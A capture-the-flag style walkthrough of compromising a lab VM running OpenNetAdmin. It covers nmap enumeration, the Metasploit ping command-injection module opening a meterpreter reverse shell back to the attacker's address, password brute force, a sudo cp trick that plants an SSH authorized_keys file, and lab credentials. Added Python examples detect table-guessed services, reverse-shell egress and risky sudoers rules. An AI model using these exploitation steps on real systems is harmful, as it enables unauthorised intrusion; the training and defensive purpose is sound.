Nmap:
1. Host discovery:
nmap -sn 192.168.20.1/24
2. Port scan:
nmap -sS -p- 192.168.20.131
3. Service detection:
nmap -sVC -p 22,80,10000 -O --version-all 192.168.20.131
Here we find that port 10000 is also an HTTP service.
Service vulnerability scan:
nmap -p 22,80,10000 --script=vuln 192.168.20.131
Because the earlier probe showed that port 10000 is HTTP, the scan results for port 10000 here are wrong.
We see that port 80 has a /robots.txt.
Web foothold:
Visiting http://192.168.20.131 shows nothing, so we look at robots.txt.
It reveals a directory; visiting that directory:
http://192.168.20.131:10000/ does display a page, telling us to use https.
Here we could only try brute force and SQL injection, both without result, so we go back to port 80.
The page title reveals: OpenNetAdmin :: 0wn Your Network, a network management tool.
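NSE scripts such as --script=vuln decide which scripts to run from the service name nmap has for a port; without -sV that name comes from the nmap-services table, not from a probe, which is why the vuln results for port 10000 above cannot be trusted. The following is an added example (not part of the write-up) that reads nmap -oX output and lists open ports whose service name is only table-guessed (the XML service element's method attribute is "table" rather than "probed"); the XML is constructed to mirror the scan above, not a real capture.

```python
"""List nmap-reported services that were table-guessed rather than probed.
Script results on those ports should be re-run after a -sV scan.
Added example; SAMPLE_NMAP_XML is constructed, not real nmap output."""
import xml.etree.ElementTree as ET

# Constructed nmap -oX excerpt: 22 and 80 were version-probed, 10000 was
# only matched from the nmap-services table (as in a scan run without -sV).
SAMPLE_NMAP_XML = """\
<nmaprun scanner="nmap">
  <host>
    <address addr="192.168.20.131" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="10000">
        <state state="open" reason="syn-ack"/>
        <service name="snet-sensor-mgmt" method="table" conf="3"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

def parse_open_ports(xml_text):
    """Return one dict {host, port, service, method} per open port."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            results.append({
                "host": addr,
                "port": int(port.get("portid")),
                "service": svc.get("name") if svc is not None else None,
                # "probed" = found by -sV; "table" = guessed from nmap-services
                "method": svc.get("method") if svc is not None else None,
            })
    return results

def unverified_services(xml_text):
    """Open ports whose service name was never confirmed by a version probe."""
    return [p for p in parse_open_ports(xml_text) if p["method"] != "probed"]

if __name__ == "__main__":
    for p in unverified_services(SAMPLE_NMAP_XML):
        print(f'{p["host"]}:{p["port"]} reported as {p["service"]} '
              f'({p["method"]}) - rerun scripts after -sV')
```

Run the real scan with -oX and feed the file to parse_open_ports; any port listed by unverified_services needs a -sV pass before its --script=vuln output means anything.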
exp -> shell:
Here we find an msf command-injection exploit module and an RCE (remote command execution) script for this software.
Using msf directly is quicker.
msf6 > search opennetadmin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/opennetadmin_ping_cmd_injection 2019-11-19 excellent Yes OpenNetAdmin Ping Command Injection
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/opennetadmin_ping_cmd_injection
msf6 > use 0
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set lhost 192.168.20.128
lhost => 192.168.20.128
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set rhost 192.168.20.131
rhost => 192.168.20.131
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > show options
Module options (exploit/unix/webapp/opennetadmin_ping_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.20.131 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /ona/login.php yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.20.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.20.128:4444
[*] Exploiting...
[*] Sending stage (1017704 bytes) to 192.168.20.131
[*] Meterpreter session 1 opened (192.168.20.128:4444 -> 192.168.20.131:32810) at 2024-04-16 14:48:04 +0800
[*] Command Stager progress - 100.00% done (706/706 bytes)
meterpreter >
We have a shell; now spawn a stable one.
Privilege escalation:
In the reports directory we find a hidden .htaccess file,
which tells us the password is about 10 characters long and made up only of the characters aefhrt.
Generate the password list with crunch:
Brute-forced credentials:
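From the defender's side, the session above has a recognisable network shape: the web server itself initiates an HTTP fetch to SRVPORT (8080) for the command stager and then a TCP connection back to LHOST:LPORT (192.168.20.128:4444). A server that only serves should never initiate either. The following is an added example (not part of the write-up) that applies that policy to flow records; the CSV records are constructed to mirror the addresses above, and the allowed-egress list is an assumed policy.

```python
"""Flag outbound connections initiated by a host that should only accept
connections, the shape of a reverse-shell callback and its payload stager.
Added example; SAMPLE_CONN_LOG is constructed flow data, not a capture."""
import csv
from io import StringIO

# Constructed netflow-style records, initiator first: ts,src,sport,dst,dport,proto
SAMPLE_CONN_LOG = """\
ts,src,sport,dst,dport,proto
1713250080.1,192.168.20.131,41022,192.168.20.1,53,udp
1713250081.4,192.168.20.131,51200,93.184.216.34,443,tcp
1713250083.9,192.168.20.131,36614,192.168.20.128,8080,tcp
1713250084.2,192.168.20.131,32810,192.168.20.128,4444,tcp
1713250085.0,192.168.20.50,55002,192.168.20.131,80,tcp
"""

# Assumed policy for this example: the web server may only initiate DNS,
# NTP and HTTPS; anything else it initiates is an anomaly.
SERVER_HOSTS = {"192.168.20.131"}
ALLOWED_EGRESS = {("udp", 53), ("udp", 123), ("tcp", 443)}
# Default listener ports of the stager (SRVPORT) and handler (LPORT) shown above.
KNOWN_CALLBACK_PORTS = {4444, 8080}

def detect_egress(csv_text, servers=SERVER_HOSTS, allowed=ALLOWED_EGRESS):
    """Return one alert dict per policy-violating flow initiated by a server."""
    alerts = []
    for row in csv.DictReader(StringIO(csv_text)):
        if row["src"] not in servers:
            continue  # inbound traffic to the server is expected
        dport = int(row["dport"])
        if (row["proto"], dport) in allowed:
            continue
        if dport in KNOWN_CALLBACK_PORTS:
            severity, reason = "high", "matches a default stager/callback port"
        else:
            severity, reason = "medium", "egress not covered by server policy"
        alerts.append({
            "ts": float(row["ts"]),
            "src": row["src"],
            "dst": row["dst"],
            "dport": dport,
            "severity": severity,
            "reason": reason,
        })
    return alerts

if __name__ == "__main__":
    for a in detect_egress(SAMPLE_CONN_LOG):
        print(f'{a["severity"]:6} {a["src"]} -> {a["dst"]}:{a["dport"]}  {a["reason"]}')
```

The port list only raises severity; the alert itself comes from the policy violation, so an attacker changing LPORT still trips the medium-severity rule. The same policy expressed as an egress firewall rule on the server stops the stager download before any session opens.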
douglas/fatherrrrr
SSH:
Log in directly over ssh. The aim here is to get into the higher-privileged user jen. We found a public key,
so we copy it into jen's home directory.
cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh
ssh jen@192.168.52.132
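The sudo -u jen /bin/cp step above only works because a sudoers rule lets douglas run cp as jen, and cp as jen can write jen's ~/.ssh/authorized_keys. The following is an added example (not part of the write-up) of a simplified sudoers audit that flags rules granting a file-writing or shell-spawning binary as another user; the sudoers excerpt is constructed, since the write-up does not show the real rule, and the parser handles plain user rules only, not aliases or @include files.

```python
"""Simplified sudoers audit: find rules that let a user act as another user
through a binary that can overwrite files or spawn a shell.
Added example; SAMPLE_SUDOERS is constructed, not taken from the target."""
import os
import re

# Constructed excerpt in sudoers syntax: user host=(runas) [TAG:] command[, command]
SAMPLE_SUDOERS = """\
# constructed for the example
Defaults env_reset
root ALL=(ALL:ALL) ALL
douglas ALL=(jen) NOPASSWD: /bin/cp
backup ALL=(root) /usr/bin/rsync, /bin/tar
www-data ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart
"""

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("#", "Defaults", "Cmnd_Alias", "User_Alias",
                 "Host_Alias", "Runas_Alias")

# Binaries that let the caller write files owned by the run-as user
# (for example ~/.ssh/authorized_keys) or obtain a shell as that user.
FILE_WRITERS = {"cp", "mv", "tee", "dd", "install", "rsync", "tar"}
SHELL_SPAWNERS = {"sh", "bash", "dash", "zsh", "vi", "vim", "less", "more",
                  "find", "awk", "perl", "python", "python3"}

def parse_sudoers(text):
    """Return one dict per plain user rule; run-as defaults to root."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0]  # drop ":group"
        rules.append({
            "user": m.group("user"),
            "runas": runas or "root",
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules

def audit_sudoers(text):
    """Return findings for rules that hand over more than they appear to."""
    findings = []
    for rule in parse_sudoers(text):
        if rule["user"] == "root":
            continue  # root gains nothing from sudo
        for cmd in rule["commands"]:
            name = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                reason = "unrestricted command set"
            elif name in FILE_WRITERS:
                reason = ("can overwrite any file the run-as user owns, "
                          "e.g. ~/.ssh/authorized_keys")
            elif name in SHELL_SPAWNERS:
                reason = "can spawn an interactive shell as the run-as user"
            else:
                continue
            findings.append({"user": rule["user"], "runas": rule["runas"],
                             "command": cmd, "nopasswd": rule["nopasswd"],
                             "reason": reason})
    return findings

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f'{f["user"]} -> {f["runas"]}: {f["command"]} ({f["reason"]})')
```

Run it over the output of sudo -l or the files under /etc/sudoers.d on hosts you administer. The fix for a rule like the douglas one is to grant a wrapper script that performs the single required copy, not cp itself, and to keep ~/.ssh owned and writable only by its user so that StrictModes rejects a key file written by someone else.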
We find a mail; go and read it.
It shows that the password of user moss is Fire!Fire!
We find a script file; viewing it gives garbage, so we just run it directly and escalate to root.